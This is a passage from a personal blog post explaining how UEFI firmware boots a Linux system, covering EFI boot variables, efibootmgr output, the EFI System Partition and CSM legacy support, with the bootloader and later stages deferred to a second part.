<p>UEFI is the successor of BIOS, although as many people still erroneously refer to UEFI as BIOS, the old BIOS is often referred to as Legacy BIOS; so things can get a bit confusing when people are referring to the BIOS - do they mean UEFI or legacy?!</p>
<p>Upon executing, UEFI will begin initialising and checking hardware; this includes things like peripherals allowing for mouse use in the boot menu, wild! Next it checks the special EFI variables stored in nonvolatile RAM (NVRAM). These store configurations that can be set by the OS or the user. You can access these with root perms via the command <code>efibootmgr -v</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">[sam@opulence ~]$ efibootmgr -v
</span></span><span class="line"><span class="cl">BootCurrent: 0008
</span></span><span class="line"><span class="cl">Timeout: 2 seconds
</span></span><span class="line"><span class="cl">BootOrder: 0000,0001,0002,0003,0004,0005,0006
</span></span><span class="line"><span class="cl">Boot0000* EndeavourOS
</span></span><span class="line"><span class="cl">                        HD(1,
</span></span><span class="line"><span class="cl">                           GPT,
</span></span><span class="line"><span class="cl">                           xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx,
</span></span><span class="line"><span class="cl">                           0x1000,
</span></span><span class="line"><span class="cl">                           0x100000
</span></span><span class="line"><span class="cl">                        )/File(\EFI\ENDEAVOUROS\GRUBX64.EFI)
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">Boot0004* UEFI:CD/DVD Drive     BBS(129,,0x0)
</span></span><span class="line"><span class="cl">Boot0005* UEFI:Removable Device BBS(130,,0x0)
</span></span><span class="line"><span class="cl">Boot0006* UEFI:Network Device   BBS(131,,0x0)
</span></span></code></pre></div><p>So we can see here that among other uses, the EFI variables determine the order in which the boot manager will attempt to load UEFI drivers and applications.</p>
<p>After loading up these variables, UEFI will begin to try and load each of the active entries listed, in the order defined by <code>BootOrder</code>. <code>Boot0000</code> defines a typical UEFI native boot entry and tells UEFI:</p>
<ol>
<li>Exactly where to look via the <code>EFI_DEVICE_PATH_PROTOCOL</code>. This is the <code>HD(1,GPT,xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx,0x1000,0x100000)</code> bit.</li>
<li>What file to load. This is the <code>File(\EFI\ENDEAVOUROS\GRUBX64.EFI)</code> bit and as the name suggests is the GRUB bootloader for my EndeavourOS install.</li>
</ol>
<p>Armed with this information, UEFI will now go ahead and look for the EFI System Partition (ESP) on the specified storage device, mount it and launch that file. Given just a disk, UEFI is able to find the ESP via the GPT entries we mentioned earlier, where &ldquo;ESP&rdquo; is one of the possible attributes a partition can have.</p>
<p>One of the key improvements of UEFI is that it is capable of reading the FAT12, FAT16 and FAT32 file systems. So typically the ESP will be formatted as FAT32, allowing UEFI to read the partition and locate our <code>ENDEAVOUROS\GRUBX64.EFI</code> file and launch it.</p>
<h3 id="the-esp">The ESP</h3>
<p>While we&rsquo;re on the topic of the ESP, it&rsquo;s worth mentioning the flexibility of this partition. Usually sized around 300-500MB, the ESP can contain the bootloaders for multiple OS&rsquo;s and will have corresponding EFI vars in NVRAM. So you&rsquo;re ESP could look something like this<a href="https://wiki.mageia.org/en/About_EFI_UEFI">[2]</a>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">/</span><span class="n">boot</span><span class="o">/</span><span class="n">efi</span><span class="o">/</span><span class="n">EFI</span>
</span></span><span class="line"><span class="cl"><span class="err">├──</span> <span class="n">boot</span>
</span></span><span class="line"><span class="cl"><span class="err">│</span> <span class="err">├──</span> <span class="n">bootx64</span><span class="o">.</span><span class="n">efi</span> <span class="p">[</span><span class="n">Default</span> <span class="n">bootloader</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="err">│</span> <span class="err">└──</span> <span class="n">bootx64</span><span class="o">.</span><span class="n">OEM</span> <span class="p">[</span><span class="n">Backup</span> <span class="n">of</span> <span class="n">same</span> <span class="n">as</span> <span class="n">delivered</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="err">│</span>
</span></span><span class="line"><span class="cl"><span class="err">├──</span> <span class="n">EndeavourOS</span>
</span></span><span class="line"><span class="cl"><span class="err">│</span> <span class="err">└──</span> <span class="n">grubx64</span><span class="o">.</span><span class="n">efi</span>
</span></span><span class="line"><span class="cl"><span class="o">|</span>
</span></span><span class="line"><span class="cl"><span class="err">├──</span> <span class="n">Ubuntu</span>
</span></span><span class="line"><span class="cl"><span class="err">│</span> <span class="err">└──</span> <span class="n">grubx64</span><span class="o">.</span><span class="n">efi</span>
</span></span></code></pre></div><h3 id="csm">CSM</h3>
<p>One finally feature worth touching on is the Compatibility Support Module (CSM) in UEFI, which essentially provides Legacy BIOS compatibility via emulating a BIOS environment. This is an example where you&rsquo;re GPTs &ldquo;Protective MBR&rdquo; would come in handy.</p>
<h4 id="refs-extras">Refs &amp; Extras</h4>
<ol>
<li><a href="https://whatis.techtarget.com/definition/Unified-Extensible-Firmware-Interface-UEFI#:~:text=Unified%20Extensible%20Firmware%20Interface%20(UEFI)%20is%20a%20specification%20for%20a,its%20operating%20system%20(OS).&amp;text=Like%20BIOS%2C%20UEFI%20is%20installed,runs%20when%20booting%20a%20computer">https://whatis.techtarget.com/definition/Unified-Extensible-Firmware-Interface-UEFI</a></li>
<li><a href="https://wiki.mageia.org/en/About_EFI_UEFI">https://wiki.mageia.org/en/About_EFI_UEFI</a></li>
<li><a href="https://www.happyassassin.net/posts/2014/01/25/uefi-boot-how-does-that-actually-work-then/">https://www.happyassassin.net/posts/2014/01/25/uefi-boot-how-does-that-actually-work-then/</a></li>
</ol>
<h2 id="0x03-optional-bootloader">0x03 Optional Bootloader</h2>
<p><img src="https://sam4k.com/content/images/2021/10/notsofast.gif" alt=""></p>
<p>It looks like I severely underestimated the length of this post, (we&rsquo;re already 1700 words!), so to make this a bit more manageable I&rsquo;m going to split this into two posts.</p>
<p>The next post, part 2, will cover the following section:</p>
<ul>
<li>0x03 Optional Bootloader (surprise, surprise!)</li>
<li>0x04 The Kernel</li>
<li>0x05 Systemd (yikes)</li>
</ul>
<p>exit(0);</p>
]]></content:encoded></item></channel></rss>